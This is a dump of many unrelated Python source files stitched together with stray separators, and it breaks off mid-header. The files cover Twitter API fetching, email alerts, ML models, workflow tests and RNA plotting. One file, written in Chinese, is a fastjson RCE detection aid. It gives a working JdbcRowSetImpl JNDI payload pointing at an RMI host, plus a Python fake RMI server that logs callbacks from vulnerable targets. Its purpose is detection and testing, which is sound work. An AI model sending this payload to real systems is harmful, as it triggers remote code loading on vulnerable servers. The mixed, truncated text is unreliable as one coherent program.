Only 100 tweet_ids can be queried at a time
See:
https://developer.twitter.com/en/docs/twitter-api/tweets/lookup/api-reference/get-tweets
"""
# Get this list of tweets
params = {
"ids": ",".join([str(t) for t in tweets_ids]),
"tweet.fields": "created_at,referenced_tweets",
"expansions": "author_id,referenced_tweets.id,referenced_tweets.id.author_id",
}
req = self.api2.request(f"tweets", params=params)
if req.status_code != 200:
raise ValueError(f"Error while fetching tweets {tweets_ids}: ", req.text)
res = req.response.json()
# This request can only be done every 1 second
time.sleep(2)
return res.get("data", [])
def get_user_tweets(self, user_id, start_time=None, end_time=None, page_size=100):
@auto_retry
def request_tweets(next_token=None):
# Builds params for this request
params = {
"max_results": page_size,
"pagination_token": next_token,
"tweet.fields": "author_id,in_reply_to_user_id,created_at,public_metrics",
"start_time": start_time,
"end_time": end_time,
}
# Perform request
req = self.api2.request(
f"users/:{user_id}/tweets",
params=params,
)
if req.status_code != 200:
raise ValueError("Error while fetching tweets: ", req.text)
response = req.response.json()
# This request can be performed every second
time.sleep(1)
return response.get("data", []), response.get("meta", dict())
# Start returning tweets
tweets, meta = request_tweets()
while tweets:
for item in tweets:
yield item
# Request more tweets
next_token = meta.get("next_token")
if next_token:
tweets, meta = request_tweets(next_token)
else:
tweets = []
@auto_retry
def get_tweet_favs(self, tweet_id):
# Get the list of users who liked this tweet.
req = self.api2.request(f"tweets/:{tweet_id}/liking_users")
if req.status_code != 200:
raise ValueError("Error while fetching favs: ", req.text)
res = req.response.json()
# This request can only be done every 15 seconds
time.sleep(15)
return [user["id"] for user in res.get("data", [])]
@auto_retry
def get_retweeters(self, tweet_id):
# Get the list of everyone who has retweeted this tweet
# This request has no rate limit
req = self.api1.request(
f"statuses/retweeters/ids",
params={"id": tweet_id, "count": 100, "stringify_ids": True},
)
if req.status_code != 200:
raise ValueError("Error while fetching RTs: ", req.text)
res = req.response.json()
return res.get("ids", []) |
import smtplib
import json
from email.message import EmailMessage
import winsound
with open('./quant/config.json') as json_file:
data = json.load(json_file)
GMAIL_USER = data['gmail']['user']
GMAIL_PASSWORD = data['gmail']['password']
SUBSCRIBERS = data['subscribers']
def notification(source, ticker, interval, timeframe, url):
print("not start")
winsound.Beep(700, 1000)
msg = EmailMessage()
msg['From'] = GMAIL_USER
msg['To'] = SUBSCRIBERS
msg['Subject'] = f'{source} {ticker}'
msg.set_content("\n" + source + " has been detected on " + ticker + " on timeframe : " + str(interval) + \
timeframe.name + "\n" + url)
try:
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.ehlo()
server.login(GMAIL_USER, GMAIL_PASSWORD)
server.send_message(msg)
server.close()
print('Email sent!')
except Exception as e:
print(e)
print('Something went wrong...')
|
'''
the primary output of the project
this script performs the actual image search
'''
from shared.configurationParser import retrieveConfiguration as rCon
from shared.histogramFeatureMethods import singleImageHisto
from shared.convnetFeatureMethods import singleImageConv
from shared.localBinaryPatternsMethods import singleImageLBP
from shared.similarityMethods import getMostLeastSimilar
from shared.utilities import loadLabelled, loadObj
import matplotlib.pyplot as plt
playIndex = rCon('PLAY_IMAGE_INDEX')
playImages, playLabels = loadLabelled(rCon('DATA_NAME_PLAY'))
selectedImage = playImages[playIndex]
selectedImageClass = playLabels[playIndex]
method = rCon('SEARCHER_METHOD')
if method == 'HISTOGRAM':
dbFeatures, dbLabels = loadLabelled(rCon('HISTOGRAM_FEATURE_PATH_TRAINING'))
features = singleImageHisto(selectedImage, bucket_resolution=rCon('HISTOGRAM_BUCKET_RESOLUTION'))
elif method == 'CNN':
dbFeatures, dbLabels = loadLabelled(rCon('CONVNET_FEATURE_PATH_TRAINING'))
model = loadObj(rCon('CONVNET_MODEL_PATH'))
features = singleImageConv(selectedImage, model=model)
elif method == 'LBP':
dbFeatures, dbLabels = loadLabelled(rCon('LBP_FEATURE_PATH_TRAINING'))
features = singleImageLBP(selectedImage)
else:
raise TypeError()
msIdx, lsIdx, _, _ = getMostLeastSimilar(dbFeatures, features, qty_most=4 , qty_least=4)
dbImages,_ = loadLabelled(rCon('DATA_NAME_TRAINING'))
plt.imshow(selectedImage)
plt.show()
mostSimilarImages = dbImages[msIdx].tolist()
for image in mostSimilarImages:
plt.imshow(image)
plt.show()
leastSimilarImages = dbImages[lsIdx].tolist()
print(lsIdx)
for image in leastSimilarImages:
plt.imshow(image)
plt.show() |
import torch as tc
class LinearActionValueHead(tc.nn.Module):
def __init__(self, num_features, num_actions):
super().__init__()
self._num_features = num_features
self._num_actions = num_actions
self._linear = tc.nn.Linear(
in_features=self._num_features,
out_features=self._num_actions,
bias=True)
@property
def num_actions(self):
return self._num_actions
def forward(self, x):
qpred = self._linear(x)
return qpred
class DuelingActionValueHead(tc.nn.Module):
def __init__(self, num_features, num_actions):
super().__init__()
self._num_features = num_features
self._num_actions = num_actions
self._value_head = tc.nn.Sequential(
tc.nn.Linear(self._num_features, self._num_features, bias=True),
tc.nn.ReLU(),
tc.nn.Linear(self._num_features, 1, bias=True)
)
self._advantage_head = tc.nn.Sequential(
tc.nn.Linear(self._num_features, self._num_features, bias=True),
tc.nn.ReLU(),
tc.nn.Linear(self._num_features, self._num_actions, bias=False)
)
@property
def num_actions(self):
return self._num_actions
def forward(self, x):
vpred = self._value_head(x)
apred = self._advantage_head(x)
apred -= apred.mean(dim=-1).unsqueeze(-1)
qpred = vpred + apred
return qpred
|
#
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from unittest.mock import MagicMock, mock_open, patch
from typing import List
from platform_resources.workflow import ArgoWorkflow
workflow_w_two_param = ArgoWorkflow()
workflow_w_two_param.body = {'spec': {'arguments': {'parameters': [{'name': 'test-param-1', 'value': 'test-value-1'},
{'name': 'test-param-2', 'value': 'test-value-2'}]}}}
workflow_wo_value = ArgoWorkflow()
workflow_wo_value.body = {'spec': {'arguments': {'parameters': [{'name': 'test-param-1', 'value': 'test-value-1'},
{'name': 'test-param-2'}]}}}
process_template = '''
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: process-template-
spec:
entrypoint: process-template
templates:
{}
- name: process-template
container:
image: "process-image"
command: [process-command]
args: ["-test-param"]
tolerations:
- key: "master"
operator: "Exists"
effect: "NoSchedule"
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: master
operator: In
values:
- "True"
'''
workflow_template = '''
---
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: workflow-template
spec:
entrypoint: {}
arguments:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
value: ''
volumes:
- name: input-home
persistentVolumeClaim:
claimName: input-home
- name: input-public
persistentVolumeClaim:
claimName: input-public
- name: output-home
persistentVolumeClaim:
claimName: output-home
- name: output-public
persistentVolumeClaim:
claimName: output-public
templates:
{}
- name: workflow-template
inputs:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
container:
image: "{{inputs.parameters.cluster-registry-address}}/nauta/openvino-mo:1.5.12-dev"
command: [bash]
args: ["-c", "python3 mo.py --saved_model_dir {{inputs.parameters.saved-model-dir-path}} --output_dir /mnt/output/home/{{workflow.name}} {{inputs.parameters.additional-params}}"]
volumeMounts:
- name: input-home
mountPath: /mnt/input/home
readOnly: True
- name: input-public
mountPath: /mnt/input/root
readOnly: True
- name: output-home
mountPath: /mnt/output/home
- name: output-public
mountPath: /mnt/output/root
readOnly: True
- name: output-public
mountPath: /mnt/output/root/public
subPath: public
- name: input-public
mountPath: /mnt/input/root/public
subPath: public
tolerations:
- key: "master"
operator: "Exists"
effect: "NoSchedule"
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: master
operator: In
values:
- "True"
'''
workflow_steps = '''- name: step-template
inputs:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
steps:
- - name: step1
template: step1-template
arguments:
parameters:
- name: cluster-registry-address
- name: saved-model-dir-path
- name: additional-params
'''
def test_parameters():
assert workflow_w_two_param.parameters == {'test-param-1': 'test-value-1', 'test-param-2': 'test-value-2'}
def test_set_parameters():
workflow_w_two_param.parameters = {'test-param-2': 'new-value'}
assert workflow_w_two_param.parameters == {'test-param-1': 'test-value-1', 'test-param-2': 'new-value'}
def test_set_parameters_error():
with pytest.raises(KeyError):
workflow_wo_value.parameters = {'test-param-1': 'new-value'}
def test_wait_for_completion(mocker):
workflow_status_mock = MagicMock()
workflow_status_mock.phase = 'Succeeded'
get_workflow_mock = mocker.patch('platform_resources.workflow.ArgoWorkflow.get', return_value=workflow_status_mock)
test_workflow = ArgoWorkflow()
test_workflow.wait_for_completion()
assert get_workflow_mock.call_count == 1
def test_wait_for_completion_failure(mocker):
workflow_status_mock = MagicMock()
workflow_status_mock.phase = 'Failed'
get_workflow_mock = mocker.patch('platform_resources.workflow.ArgoWorkflow.get', return_value=workflow_status_mock)
test_workflow = ArgoWorkflow()
with pytest.raises(RuntimeError):
test_workflow.wait_for_completion()
assert get_workflow_mock.call_count == 1
def check_parameters(parameters: List[dict]):
cra = None
smd = None
adp = None
for parameter in parameters:
name = parameter['name']
if name == 'cluster-registry-address':
cra = True
elif name == 'saved-model-dir-path':
smd = True
elif name == 'additional-params':
adp = True
assert cra
assert smd
assert adp
def test_add_proces_add_steps(mocker):
mocker.patch('kubernetes.config.load_kube_config')
with patch('builtins.open', mock_open(read_data=workflow_template.format('workflow-template', ''))):
main_workflow = ArgoWorkflow.from_yaml('workflow_template')
with patch('builtins.open', mock_open(read_data=process_template.format(''))):
process_workflow = ArgoWorkflow.from_yaml('process_template')
main_workflow.add_process(process_workflow)
spec = main_workflow.body['spec']
assert spec['entrypoint'] == 'workflow-template-process-template'
list_of_templates = spec['templates']
process_template_exists = False
flow_template_exists = False
for template in list_of_templates:
if template['name'] == 'workflow-template-process-template':
flow_template_exists = True
assert template.get('steps')
assert len(template.get('steps')) == 2
swt = None
pwt = None
for step in template.get('steps'):
step_name = step[0]['name']
if step_name == 'workflow-template':
swt = step
elif step_name == 'process-template':
pwt = step
parameters = step[0].get('arguments', []).get('parameters', [])
assert parameters
check_parameters(parameters)
assert swt
assert pwt
elif template['name'] == 'process-template':
process_template_exists = True
parameters = template.get('inputs', []).get('parameters')
assert parameters
check_parameters(parameters)
assert process_template_exists
assert flow_template_exists
def test_add_process_with_steps(mocker):
mocker.patch('kubernetes.config.load_kube_config')
with patch('builtins.open', mock_open(read_data=workflow_template.format('step-template', workflow_steps))):
main_workflow = ArgoWorkflow.from_yaml('workflow_template')
with patch('builtins.open', mock_open(read_data=process_template.format(''))):
process_workflow = ArgoWorkflow.from_yaml('process_template')
main_workflow.add_process(process_workflow)
spec = main_workflow.body['spec']
assert spec['entrypoint'] == 'step-template'
list_of_templates = spec['templates']
process_template_exists = False
flow_template_exists = False
step_template_exists = False
for template in list_of_templates:
if template['name'] == 'step-template':
step_template_exists = True
assert template.get('steps')
assert len(template.get('steps')) == 2
swt = None
pwt = None
for step in template.get('steps'):
step_name = step[0]['name']
if step_name == 'step1':
swt = step
elif step_name == 'process-template':
pwt = step
parameters = step[0].get('arguments', []).get('parameters', [])
assert parameters
check_parameters(parameters)
assert swt
assert pwt
elif template['name'] == 'workflow-template':
flow_template_exists = True
elif template['name'] == 'process-template':
process_template_exists = True
parameters = template.get('inputs', []).get('parameters')
assert parameters
check_parameters(parameters)
assert process_template_exists
assert flow_template_exists
assert step_template_exists
def test_add_process_with_steps_in_process(mocker):
mocker.patch('kubernetes.config.load_kube_config')
with patch('builtins.open', mock_open(read_data=workflow_template.format('workflow-template', ''))):
main_workflow = ArgoWorkflow.from_yaml('workflow_template')
with patch('builtins.open', mock_open(read_data=process_template.format(workflow_steps))):
process_workflow = ArgoWorkflow.from_yaml('process_template')
main_workflow.add_process(process_workflow)
spec = main_workflow.body['spec']
list_of_templates = spec['templates']
flow_template_exists = False
for template in list_of_templates:
if template['name'] == 'workflow-template-process-template':
flow_template_exists = True
assert template.get('steps')
assert len(template.get('steps')) == 2
swt = None
pwt = None
for step in template.get('steps'):
step_name = step[0]['name']
if step_name == 'step-template':
swt = step
elif step_name == 'workflow-template':
pwt = step
parameters = step[0].get('arguments', []).get('parameters', [])
assert parameters
check_parameters(parameters)
assert swt
assert pwt
assert flow_template_exists
|
import pandas as pd
import numpy as np
from sklearn import linear_model
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn import cross_validation
from sklearn.metrics import cohen_kappa_score, make_scorer
#input = pd.read_csv('features_final/Community_features.csv', index_col = 0)
#input = pd.read_csv('features_final/ProvideEmotion_features.csv', index_col = 0)
#input = pd.read_csv('features_final/ProvideInformation_features.csv', index_col = 0)
input = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/receivedinfo.csv', index_col = 0)
#input = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/provideinfo.csv', index_col = 0)
#input = pd.read_csv('/Users/josh/Dropbox/@PAPERS/2017/CSCW/data/classification/test.csv', index_col = 0, nrows=1000)
#input = pd.read_csv('features_updated/r_original_2_python_5463_post and question mark.csv', index_col = 0)
shuffled_input = input.reindex(np.random.permutation(input.index))
#print shuffled_input
#print(input.columns)
neg_proportion = len(input[input.ix[:,-1]==0])/float(len(input))
print('Proportion of negative class: '+str(neg_proportion))
#kappa = make_scorer(cohen_kappa_score)
########Logistic Regression###############
#logistic = linear_model.LogisticRegression(class_weight='balanced') # assign class_weight actually make accuracy lower, because more positive class are being identified
logistic = linear_model.LogisticRegression(class_weight={0:1, 1: 2}, penalty='l2')
print('Logistic Regression L2:')
scores = cross_validation.cross_val_score(logistic, shuffled_input.ix[:,0:-1], y=shuffled_input.ix[:,-1],cv = 10, scoring='accuracy')
print("Mean accuracy Logistic Regression from 10-fold cross-validation:")
print(scores.mean())
########Decision Tree###############
# dt = DecisionTreeClassifier(class_weight={0:1, 1:1}, max_depth=10)
# print 'Decision Tree:'
# scores_dt = cross_validation.cross_val_score(dt, shuffled_input.ix[:,0:5452], shuffled_input.ix[:,5452],cv = 10, scoring='accuracy')
# print "Mean accuracy Decision Tree from 10-fold cross-validation:"
# print scores_dt.mean()
##########Support Vector Machine###############
# svm = SVC(class_weight={0:1, 1:1}, kernel='linear')
# print 'SVM Linear Kernel:'
#svm = OneVsRestClassifier(BaggingClassifier(SVC(kernel='linear', probability=True, class_weight='auto'), max_samples=1.0 / n_estimators, n_estimators=n_estimators))
# scores_svm = cross_validation.cross_val_score(svm, shuffled_input.ix[:,0:5452], shuffled_input.ix[:,5452],cv = 10, scoring='accuracy')
# print "Mean accuracy SVM from 10-fold cross-validation:"
# print scores_svm.mean()
##########Gaussian Naive Bayes###############
# gnb = GaussianNB()
# print 'Gaussian Naive Bayes:'
#
# scores_gnb = cross_validation.cross_val_score(gnb, shuffled_input.ix[:,0:5452], shuffled_input.ix[:,5452],cv = 10, scoring='accuracy')
# print "Mean accuracy Gaussian NB from 10-fold cross-validation:"
# print scores_gnb.mean() |
from socket import *
import time
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('localhost', 25000))
while True:
start = time.time()
sock.send(b'30')
resp = sock.recv(100)
end = time.time()
print(end-start)
|
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Torch utils."""
import numpy as np
import torch
from modnas.utils import format_value, format_dict
_device = None
def version():
"""Return backend version information."""
return format_dict({
'torch': torch.__version__,
'cuda': torch._C._cuda_getCompiledVersion(),
'cudnn': torch.backends.cudnn.version(),
}, sep=', ', kv_sep='=', fmt_key=False, fmt_val=False)
def init_device(device=None, seed=11235):
"""Initialize device and set seed."""
np.random.seed(seed)
torch.manual_seed(seed)
if device != 'cpu':
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.benchmark = True
def set_device(device):
"""Set current device."""
global _device
_device = device
def get_device():
"""Return current device."""
return _device
def get_dev_mem_used():
"""Return memory used in device."""
return torch.cuda.memory_allocated() / 1024. / 1024.
def param_count(model, *args, format=True, **kwargs):
"""Return number of model parameters."""
val = sum(p.data.nelement() for p in model.parameters())
return format_value(val, *args, **kwargs) if format else val
def param_size(model, *args, **kwargs):
"""Return size of model parameters."""
val = 4 * param_count(model, format=False)
return format_value(val, *args, binary=True, **kwargs) if format else val
def model_summary(model):
"""Return model summary."""
info = {
'params': param_count(model, factor=2, prec=4),
'size': param_size(model, factor=2, prec=4),
}
return 'Model summary: {}'.format(', '.join(['{k}={{{k}}}'.format(k=k) for k in info])).format(**info)
def clear_bn_running_statistics(model):
"""Clear BatchNorm running statistics."""
for m in model.modules():
if isinstance(m, torch.nn.BatchNorm2d):
m.reset_running_stats()
def recompute_bn_running_statistics(model, trainer, num_batch=100, clear=True):
"""Recompute BatchNorm running statistics."""
if clear:
clear_bn_running_statistics(model)
is_training = model.training
model.train()
with torch.no_grad():
for _ in range(num_batch):
try:
trn_X, _ = trainer.get_next_train_batch()
except StopIteration:
break
model(trn_X)
del trn_X
if not is_training:
model.eval()
|
#fastjson rce检测之python版rmi服务器搭建
'''
fastjson检测rce时候,常常使用rmi协议。
如果目标通外网,payload可以使用rmi://randomstr.test.yourdomain.com:9999/path,通过dnslog来检测。
但是目标是内网,我们在内网也可以部署rmi server,通过查看日志看是否有主机的请求来检测。
Java 写一个Java的rmi服务挺简单的,但是如果你正在python开发某个项目,而又不想用调用java软件,此文章获取能帮助你。
POST data
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://10.183.20.41:20008/TESTPATH",
"autoCommit":true
}
}
直接贴代码
'''
#!/usr/bin/env python3
import socket
import threading
import struct
def rmi_response(client, address):
try:
client.settimeout(5)
buf = client.recv(1024)
if b"\x4a\x52\x4d\x49" in buf:
send_data = b"\x4e"
send_data += struct.pack(">h", len(address[0]))
send_data += address[0].encode()
send_data += b"\x00\x00"
send_data += struct.pack(">H", address[1])
client.send(send_data)
total=3 #防止socket的recv接收数据不完整
buf1=b""
while total:
buf1 += client.recv(512)
if len(buf1)>50:
break
if buf1:
path = bytearray(buf1).split(b"\xdf\x74")[-1][2:].decode(errors="ignore")
print("data:{}".format(buf1))
print("client:{} send path:{}".format(address, path))
except Exception as ex:
print('run rmi error:{}'.format(ex))
finally:
client.close()
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip_port = (listenip, listenport)
sock.bind(ip_port)
sock.listen(max_conn)
print("listen: {}:{} maxconnect:{}".format(listenip, listenport, max_conn))
while True:
client, address = sock.accept()
thread = threading.Thread(target=rmi_response, args=(client, address))
thread.setDaemon(True)
thread.start()
if __name__ == '__main__':
max_conn = 200
listenip = "0.0.0.0"
listenport = 20008
main()
|
import sys
import json
sys.path.insert(0,'..')
def get_stats(team_id, team_name, cache_repository, http_repository):
stats = cache_repository.get_team_stats(team_id)
if not stats:
stats = http_repository.get_team_stats(team_id, team_name)
cache_repository.set_team_stats(team_id, json.dumps(stats))
else:
stats = json.loads(stats)
return stats
def get_matches(team_id, cache_repository, http_repository):
games = cache_repository.get_team_matches(team_id)
if not games:
games = http_repository.get_team_matches(team_id)
cache_repository.set_team_matches(team_id, json.dumps(games))
else:
games = json.loads(games)
games.sort(key=lambda b: b['time'], reverse=True)
return games
|
import pyspark.sql.functions as F
from pyspark.ml import Transformer
from pyspark import keyword_only
from pyspark.ml.param.shared import HasInputCol, HasInputCols, HasOutputCol, \
Params, Param, TypeConverters, HasLabelCol, HasPredictionCol, \
HasFeaturesCol, HasThreshold
from pyspark.ml.util import DefaultParamsReadable, DefaultParamsWritable, \
JavaMLReadable, JavaMLWritable
from pyspark.sql.types import *
__all__ = [
'NullThresholdRemover'
]
class NullThresholdRemover(Transformer, HasThreshold, HasInputCols,
DefaultParamsReadable, DefaultParamsWritable):
@keyword_only
def __init__(self, inputCols=None, threshold=0.3) -> None:
super().__init__()
self._setDefault(inputCols=inputCols, threshold=threshold)
kwargs = self._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCols=None, threshold=0.3):
kwargs = self._input_kwargs
self._set(**kwargs)
def _transform(self, dataset):
threshold = self.getThreshold()
if not threshold or threshold > 1.0 or threshold < 0.0:
raise ValueError("Invalid threshold value")
cols = dataset.columns
datasetRowCount = dataset.count()
inputCols = list(set(self.getInputCols()).intersection(cols))
colsNullCount = dataset.select(
[(F.count(F.when(F.col(c).isNull(), c)) / datasetRowCount).alias(c)
for c in inputCols]).collect()
colsNullCount = [row.asDict() for row in colsNullCount][0]
colsGtTh = list(
{i for i in colsNullCount if colsNullCount[i] > threshold})
return dataset.drop(*colsGtTh) |
from matplotlib import pyplot as plt
import math
import re
import statistics
f = open("/Users/rafiqkamal/Desktop/Data_Science/RNAProject210110/RNAL20StructuresGSSizes.txt")
contents = f.readlines()
# The original code worked for what is it was made for, but after talking with the lead researcher, I see that the code needs to be a lot more robust in order to print out various graphs of various parts of the RNA structures in order to try and find patterns. To accomplish this, I will not hard code everything, but rather use some more flexible functions, data structures, and algorithms that would, for example, be able to quickly and easily input a few numbers and look at the top twenty frequencies and their corresponding hamming distances graphs, the lowest twenty frequencies and their hamming distances, or a random set of frequencies and look at their hamming distances. In addition, this code needs to be able to quickly plot scatterplots using any of the above examples.
log10_frequency_array = []
frequency_structure_array = []# create a main structure a list to hold the original clean data that will be sorted in ascending order by the frequency
count = 0 # create a count variable (primary key) that will keep track of where the particular frequency is from the original data which has a total around 11K strings
for line in contents:
x = re.findall("\d+",line)
y = re.findall("[()\.]+",line)
frequency_structure_array.append([int(x[0]),math.log10(int(x[0])),y[0]])
frequency_structure_array.sort(key=lambda x:x[1])
for line in frequency_structure_array:
count = count + 1#I added the count on this for loop because the data is not ordered in the above for loop
line.insert(0,count)
############# 1-index, frequency, log10 of frequency structure
#frequencyArray=[11219, 364197924001, 11.561337465902943, '....................']
# create a function named the hamming_maker function which will return a hash/object which keys will be the count and the values will be an array of the hamming distance(NOTE: hamming distance is just an integer, then I may make this an integer as well and not an array/list)
def hamming_maker(start,end,array):# create a function named hammingFiguresMaker which will create figures from the hamming functions 2D list with count as the first element, and the hamming distances as the second element. The labels and title of the figures is based on the count and give the mean as well
hash = []
mean_array = []
for frequencies in range(start,end):
structure = array[frequencies][3]
temp = []
for line in array:
temp.append(hamming(structure,line[3]))
hash.append([array[frequencies][0],temp])
temp = []
# for line in arr1_hammings: I am trying to modify this code so that I make the hamming graphs and the scatterplots at the same time due to the fact that I need to input the same number of five smallest means as well as the log10 frequency for a RANGE of sequences. So this would be the best place to do those two things. I need to modify my scatter plot function below as well as my hamming_maker function. Also, rename this function to be hamming_scatterplot_maker
# smallest5 = sorted(line[1])[0:5]
# mean_array.append(get_mean(smallest5))
return hash
# print(hamming(structure,array[0][3]))
####################### 1-index hamming distances
#hamming_maker output = [11219, [12, 10,...8]]
def hamming(s1,s2):
result = 0
if len(s1)!=len(s2):
print("Strings are not equal")
else:
for x,(i,j) in enumerate(zip(s1,s2)):
if i != j:
# print(f'char not math{i,j}in {x}')
result += 1
return result
def histogram_maker(array):
for arr in array:
mean = get_mean(arr[1])
plt.figure( str(arr[0]) + " Histogram")
plt.hist(arr[1])
plt.xlabel( "Structure Count: " + str(arr[0]) + " Hamming Distances")
plt.ylabel("Number of Occurences The mean:" + str(mean))
def get_mean(arr):#Modify this to take a argument for five smallest. if that is true, then return the mean of the five smallest
# create a helper function named meanMaker which will be called in the hamming_maker function to print the means of the results of the hamming_maker fucntion
return round(sum(arr) / len(arr),2)
#Input any range you want from 0 - 11219 which correlates to the ascending order of the frequencies in the original data
# last_20 = hamming_maker(0,11219,frequency_structure_array)####################### count hamming distances
#hamming_maker output = [11219, [12, 10,...8]]
# print(histogram_maker(last_20))
# plt.show(last_20)
# create a scatter_plot_maker function which will take in any two arrays/list and make a scatter plot of them. Again using the count variable to set the title and labels.
# x axis = log10 of frequenciies frequency_structure_array[2]Y
# y axis = the mean of the five smallest hamming distances (sort and last 5)
def log10_list_maker (arr):
log10_frequencies = []
for line in arr:
log10_frequencies.append(line[2])
return log10_frequencies
def scatterplot_maker (arr1_hammings,arr2_log10_freq):
log10_frequency_array = log10_list_maker(arr2_log10_freq)
# mean_array = []
# for line in arr1_hammings:
# smallest5 = sorted(line[1])[0:5]
# mean_array.append(get_mean(smallest5))
plt.figure( "Count:" + str(line[0]) + "Scatter Plot")
plt.xlabel("Count:" + str(line[0]) + "Mean of the last five Hammings")
plt.ylabel("log10 Frequencies")
plt.scatter(mean_array,log10_frequency_array)#take the mean of the five smallest for each
plt.show()
hamming_maker(11100,11219,frequency_structure_array)
# scatterplot_maker(last_20,frequency_structure_array)
# print(frequency_structure_array[:,1]) |
import pandas as pd
def dataframe_from_csv(path, header=0, index_col=0):
return pd.read_csv(path, header=header, index_col=index_col)
|
'''@package models
Contains the neural net models and their components
'''
from . import model, model_factory, run_multi_model, dblstm, \
linear, plain_variables, concat, leaky_dblstm, multi_averager,\
feedforward, leaky_dblstm_iznotrec, leaky_dblstm_notrec, dbrnn,\
capsnet, dbr_capsnet, dblstm_capsnet, dbgru, leaky_dbgru, dbresetgru, dbresetlstm, dlstm,\
dresetlstm, leaky_dlstm, encoder_decoder_cnn, regular_cnn, framer, dcnn
|
import torch
from torch import nn, Tensor
from torch.nn import functional as F
class BasicBlock(nn.Module):
"""2 Layer No Expansion Block
"""
expansion: int = 1
def __init__(self, c1, c2, s=1, downsample= None) -> None:
super().__init__()
self.conv1 = nn.Conv2d(c1, c2, 3, s, 1, bias=False)
self.bn1 = nn.BatchNorm2d(c2)
self.conv2 = nn.Conv2d(c2, c2, 3, 1, 1, bias=False)
self.bn2 = nn.BatchNorm2d(c2)
self.downsample = downsample
def forward(self, x: Tensor) -> Tensor:
identity = x
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
if self.downsample is not None: identity = self.downsample(x)
out += identity
return F.relu(out)
class Bottleneck(nn.Module):
"""3 Layer 4x Expansion Block
"""
expansion: int = 4
def __init__(self, c1, c2, s=1, downsample=None) -> None:
super().__init__()
self.conv1 = nn.Conv2d(c1, c2, 1, 1, 0, bias=False)
self.bn1 = nn.BatchNorm2d(c2)
self.conv2 = nn.Conv2d(c2, c2, 3, s, 1, bias=False)
self.bn2 = nn.BatchNorm2d(c2)
self.conv3 = nn.Conv2d(c2, c2 * self.expansion, 1, 1, 0, bias=False)
self.bn3 = nn.BatchNorm2d(c2 * self.expansion)
self.downsample = downsample
def forward(self, x: Tensor) -> Tensor:
identity = x
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
if self.downsample is not None: identity = self.downsample(x)
out += identity
return F.relu(out)
resnet_settings = {
'18': [BasicBlock, [2, 2, 2, 2]],
'34': [BasicBlock, [3, 4, 6, 3]],
'50': [Bottleneck, [3, 4, 6, 3]],
'101': [Bottleneck, [3, 4, 23, 3]],
'152': [Bottleneck, [3, 8, 36, 3]]
}
class ResNet(nn.Module):
def __init__(self, model_name: str = '50') -> None:
super().__init__()
assert model_name in resnet_settings.keys(), f"ResNet model name should be in {list(resnet_settings.keys())}"
block, depths = resnet_settings[model_name]
self.inplanes = 64
self.conv1 = nn.Conv2d(3, self.inplanes, 7, 2, 3, bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.maxpool = nn.MaxPool2d(3, 2, 1)
self.layer1 = self._make_layer(block, 64, depths[0], s=1)
self.layer2 = self._make_layer(block, 128, depths[1], s=2)
self.layer3 = self._make_layer(block, 256, depths[2], s=2)
self.layer4 = self._make_layer(block, 512, depths[3], s=2)
def _make_layer(self, block, planes, depth, s=1) -> nn.Sequential:
downsample = None
if s != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion, 1, s, bias=False),
nn.BatchNorm2d(planes * block.expansion)
)
layers = nn.Sequential(
block(self.inplanes, planes, s, downsample),
*[block(planes * block.expansion, planes) for _ in range(1, depth)]
)
self.inplanes = planes * block.expansion
return layers
def forward(self, x: Tensor) -> Tensor:
x = self.maxpool(F.relu(self.bn1(self.conv1(x)))) # [1, 64, H/4, W/4]
x1 = self.layer1(x) # [1, 64/256, H/4, W/4]
x2 = self.layer2(x1) # [1, 128/512, H/8, W/8]
x3 = self.layer3(x2) # [1, 256/1024, H/16, W/16]
x4 = self.layer4(x3) # [1, 512/2048, H/32, W/32]
return x1, x2, x3, x4
if __name__ == '__main__':
model = ResNet('50')
model.load_state_dict(torch.load('checkpoints/backbones/resnet/resnet50.pth', map_location='cpu'), strict=False)
x = torch.zeros(1, 3, 224, 224)
outs = model(x)
for y in outs:
print(y.shape) |
# MenuTitle: Replace Foreground with Background Paths
# -*- coding: utf-8 -*-
__doc__ = """
